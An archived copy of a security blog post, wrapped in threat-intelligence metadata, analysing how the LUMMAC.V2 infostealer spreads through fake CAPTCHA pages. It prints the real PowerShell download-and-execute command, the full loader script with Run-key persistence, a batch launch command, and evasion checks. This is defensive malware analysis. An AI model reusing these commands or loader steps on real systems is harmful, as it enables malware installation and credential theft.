{
	"id": "3a306aa1-312d-4ed2-82b9-dcbfbc1a900f",
	"created_at": "2026-04-06T00:09:54.611825Z",
	"updated_at": "2026-04-10T03:35:28.938957Z",
	"deleted_at": null,
	"sha1_hash": "d1a434b8dd6b88a04d06f4732290e056c930ec5c",
	"title": "Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations - Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3351867,
	"plain_text": "Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations - Part 1\r\nBy praveethdsouza\r\nPublished: 2025-04-30 · Archived: 2026-04-05 14:55:38 UTC\r\n\r\nWelcome to the Finding Malware Series\r\nThe \"Finding Malware\" blog series is authored to empower the Google Security Operations community to detect emerging and persistent malware threats. This post dives deep into the LUMMAC.V2 malware family and the detection opportunities available within Google Security Operations (SecOps). Happy hunting!\r\n\r\nAbout LUMMAC.V2\r\nAlso known as: Lumma, Lummac2, Lummastealer\r\n\r\nLUMMAC.V2 is a rework of the LUMMAC credential stealer, rewritten from C to C++, with a full-fledged binary morpher. LUMMAC.V2 is an infostealer that targets a wide range of applications, including browsers, crypto wallets, password managers, remote desktop applications, email clients, and instant messaging applications. It steals information such as credentials, logins, emails, personal and system details, screenshots, and cookies, and subsequently sends this data over HTTP in a ZIP archive.\r\n\r\nLUMMAC.V2 is a prevalent malware family often distributed via the \"ClickFix\" technique, a social engineering method in which victims are shown fake user verification CAPTCHA pages that trick them into executing commands (e.g. MSHTA or PowerShell) via the Windows Run dialog box. This action launches a PowerShell payload in the background, hidden from the user. This blog post focuses on the malware infection chain, detailing three variations used to deliver LUMMAC.V2 and execute it on the host.\r\n\r\nMalware Lifecycle\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 1 of 10\r\n\r\nDelivery, Execution, and Persistence\r\nThe infection begins with a simple internet search. Users searching for specific keywords, such as those related to cracked software, popular movies, or the latest music releases, encounter malicious links within their search results. Clicking on one of these links redirects them to a fake \"Verify You Are Human\" CAPTCHA page.\r\n\r\nThis page prompts the user to perform the following actions, mimicking a security check:\r\nPress Windows key + R (opens the Run dialog box)\r\nPress CTRL + V (pastes a command that has been secretly copied to the user's clipboard)\r\nPress Enter (executes the command)\r\n\r\nThe figure below shows an example of the deceptive page in action, while Figure 2 reveals the underlying website's source code.\r\nFigure 1: Fake captcha website\r\nFigure 2: Source code of the fake captcha\r\n\r\nHere's the PowerShell command that's executed behind the scenes:\r\nPowerShell.exe -W Hidden -command $url = 'https://finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text\r\nFigure 3: Copied PowerShell command\r\n\r\nThis command uses the Invoke-WebRequest PowerShell cmdlet to download a file called pnk3.txt from a malicious website. The -W Hidden (-WindowStyle Hidden) parameter ensures the PowerShell command runs in the background without any console window being displayed to the user. The command then reads the contents of the downloaded pnk3.txt into memory and executes it using the Invoke-Expression (iex) cmdlet.\r\n\r\nThe downloaded pnk3.txt file contains the following:\r\n$PbnjVqGN = 'https://finalstepgo[.]com/uploads/pnk33.zip';\r\n$SdpCphfa = $env:APPDATA + '\\fNeizxDR';\r\n$WSRtQbHu = $env:APPDATA + '\\vm8D2hLX.zip';\r\n$WEcmPEsQ = $SdpCphfa + '\\Perspective.exe';\r\nif (-not (TEst-paTh $SdpCphfa)) {\r\n    New-ITeM -Path $SdpCphfa -ItemType Directory\r\n};\r\nSTArT-BItSTrANSFEr -Source $PbnjVqGN -Destination $WSRtQbHu;\r\nEXPaNd-ArCHIVE -Path $WSRtQbHu -DestinationPath $SdpCphfa -Force;\r\nRemovE-itEM $WSRtQbHu;\r\nStARt-PrOcEss $WEcmPEsQ;\r\nNEW-iTemPRopeRty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'tE1koeXl' -Value $WEcmPEsQ -PropertyType 'String';\r\nFigure 4: Malicious PowerShell script\r\n\r\nThis PowerShell script is a malicious loader designed to execute in memory and perform the following:\r\nIt begins by downloading a malicious ZIP archive from a remote server using the Start-BitsTransfer PowerShell cmdlet. Subsequently, a directory is created within the user's AppData folder to serve as the destination for the extracted files.\r\nThe downloaded ZIP file is then extracted using the Expand-Archive cmdlet, and its contents are saved into the newly created directory within the AppData folder.\r\nAfter the extraction is complete, the script deletes the original ZIP file, further minimizing traces of the attack.\r\nFollowing the extraction, the script executes the malicious program, named Perspective.exe, using the Start-Process cmdlet.\r\nTo ensure persistence, the script adds a registry entry under HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run. This registry entry, named tE1koeXl, points to the path of the malicious executable, Perspective.exe, ensuring it is executed upon user logon.\r\n\r\nMandiant has discovered several variations of this malicious PowerShell script loader. Once executed, these loaders can initiate a variety of attacks to execute LUMMAC.V2, including:\r\nDLL Hijacking: Exploiting legitimate programs by introducing a malicious DLL with the same name as a legitimate one, so that it is loaded preferentially over the legitimate DLL.\r\nProcess Hollowing: Injecting malicious code into legitimate processes to conceal its activity.\r\nAutoIt-based Dropper: Utilizing the AutoIt scripting language to obfuscate and execute the LUMMAC.V2 information stealer.\r\n\r\nVariation 1: DLL Hijacking\r\nThis attack exploits a legitimate executable that is vulnerable to DLL search order hijacking to execute the LUMMAC.V2 malware.\r\n\r\nIn this variation, a malicious PowerShell script loader initiates the process by downloading tmp.txt.zip, an archive containing the files Setup.exe and a specially crafted malicious DLL, tak_deco_lib.dll, as illustrated in Figure 5.\r\nFigure 5: Archive containing malicious payload\r\n\r\nWhen executed, Setup.exe intends to load a legitimate DLL but, due to the vulnerability, it inadvertently loads the malicious tak_deco_lib.dll instead. This is clearly demonstrated in the figure below, where Setup.exe successfully loads the malicious DLL from the same directory, ultimately executing the LUMMAC.V2 malware.\r\nFigure 6: Delivery using DLL search order hijacking\r\n\r\nVariation 2: Process Hollowing\r\nProcess hollowing is a multi-stage attack technique in which malware hijacks a target process and replaces its legitimate code with malicious code. Attackers use process hollowing for malware delivery because it allows them to disguise their malicious code within a legitimate process, making it harder for security tools to detect.\r\n\r\nIn this variation of LUMMAC.V2, a malicious PowerShell script loader drops and executes MyDockFinder.exe, an in-memory dropper written in Go. MyDockFinder.exe uses process hollowing to compromise the legitimate Windows process BitlockerToGo.exe, by creating a new instance of BitlockerToGo.exe and replacing its process memory with malicious code.\r\n\r\nAn analysis of the API calls and techniques involved in this process hollowing follows below:\r\nFigure 7: Process Hollowing on BitlockerToGo.exe\r\n\r\nTo extract the injected payload, a crucial point for interception is just before the malware writes its code into the target process's memory using the NtWriteVirtualMemory API, as shown in the figure below:\r\nFigure 8: Extraction of the injected payload\r\n\r\nThe extracted payload, obtained from MyDockFinder.exe's memory at address 0x05480000, produced a SHA256 hash of 842639021ac1b780ee77e7c40ca98745677cbf156764201638b6d33ac8c6f548. This hash allowed for further investigation, ultimately revealing the payload's identity as the LUMMAC.V2 malware, as shown in the figure below.\r\nFigure 9: Identification of the extracted payload\r\n\r\nVariation 3: AutoIt-based Dropper\r\nIn this variation, a malicious PowerShell script loader drops and executes a binary file named Vkcm1ks1s3.exe, which is a memory-only dropper implemented as an NSIS installation package. Upon execution, this binary drops multiple malicious files into the user's temporary folder located at C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp, as illustrated in the figure below:\r\nFigure 10: Files dropped by the malware\r\n\r\nVkcm1ks1s3.exe then executes the following command to rename the Northwest file to Northwest.bat and run it:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c copy Northwest Northwest.bat \u0026 Northwest.bat\r\n\r\nNorthwest.bat is a heavily obfuscated Windows batch file that, once decoded, contains the following:\r\nFigure 11: Deobfuscated Northwest.bat file\r\n\r\nThis batch script is designed to evade detection and execute a malicious payload:\r\nObfuscation: The script hides its true commands using Set command variable assignments.\r\nAnti-Analysis Checks:\r\nIt scans for security applications like Webroot SecureAnywhere and Quick Heal AntiVirus. If found, it initiates 186 pings to the loopback address.\r\nIt also checks for Avast Antivirus, AVG Antivirus, Bitdefender, Norton Security, and Sophos Endpoint Defence Software. If detected, it sets variables like Permanent.pif to AutoIT.exe and JgBvUTNMyahDmpGgfTNcnvh to .a3x, attempting to replace original filenames to evade detection.\r\nPayload Delivery:\r\nIt creates a folder named 374415.\r\nIt uses findstr with the /V option to filter out lines containing the string \"CowReboundHeadingRedeem\" from a file named Beth and redirects the output to Permanent.pif.\r\nIt uses copy /b to append the contents of Elder to Permanent.pif (located in the 374415 directory); after the contents of Elder are appended, Permanent.pif is a legitimate AutoIt binary.\r\nIt navigates to the 374415 directory and concatenates the files Suddenly, Guest, Foundation, Silence, Transfer, Hudson, and Franchise into A.a3x, an obfuscated AutoIt script.\r\nIt executes the AutoIt script A.a3x using the AutoIt binary Permanent.pif with start /I.\r\nDelay:\r\nIt uses the Choice command to introduce a 5-second delay before exiting, allowing the payload to execute.\r\n\r\nMandiant deobfuscated the AutoIt script (illustrated in the figure below). This script is a memory-only dropper for the LUMMAC.V2 infostealer.\r\n\r\nThe script initiates its execution with a series of anti-analysis checks:\r\nSandbox Evasion: It checks the host computer's name against known AV emulator hostnames such as tz (Bitdefender), NfZtFbPfH (Kaspersky), and ELICZ (AVG), and checks for the username test22, commonly found in analysis setups.\r\nAntivirus Evasion: It specifically targets Avast Antivirus by checking if the avastui.exe process is currently running.\r\nFigure 12.1: Sandbox and Antivirus Evasion\r\nAnti-Debugging: A time-based check using the GetTickCount API is employed to detect if the script is being run in a debugger or analyzed step-by-step.\r\nFigure 12.2: Anti-Debugging\r\nSimulated Internet Detection: It pings an invalid domain (HfhrdyrpMfGsKgEBCkTWjnP.HfhrdyrpMfGsKgEBCkTWjnP) to ensure it's not running in an isolated environment with fake internet services.\r\nIf any of the above checks are triggered, the script terminates.\r\nThe script deletes the original AutoIt script file (A.a3x) from the disk.\r\nFigure 12.3: Simulated Internet Detection and script deletion\r\n\r\nOnce the initial anti-analysis checks are passed, the script proceeds to construct its encrypted payload from a hex string hardcoded within the script. To ensure compatibility, the script determines the process architecture (32-bit or 64-bit) and utilizes the appropriate shellcode to copy and decrypt the hex string into a designated memory buffer. The script employs the RtlDecompressFragment API to decompress the payload, which was compressed using the LZNT1 algorithm, before executing it in memory.\r\n\r\nThe final payload executing in memory is identified as the LUMMAC.V2 malware.\r\n\r\nHaving detailed the intricate delivery, execution, and persistence mechanisms of LUMMAC.V2 in Part 1, we now transition from how this potent infostealer establishes a foothold to understanding its communication and data exfiltration capabilities. Part 2 will thoroughly examine LUMMAC.V2's network communication, from its initial C2 server reconnaissance and sophisticated data staging to the methods it employs for exfiltrating stolen sensitive information.\r\n\r\nSource: https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110"
	],
	"report_names": [
		"899110"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434194,
	"ts_updated_at": 1775792128,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d1a434b8dd6b88a04d06f4732290e056c930ec5c.pdf",
		"text": "https://archive.orkl.eu/d1a434b8dd6b88a04d06f4732290e056c930ec5c.txt",
		"img": "https://archive.orkl.eu/d1a434b8dd6b88a04d06f4732290e056c930ec5c.jpg"
	}
}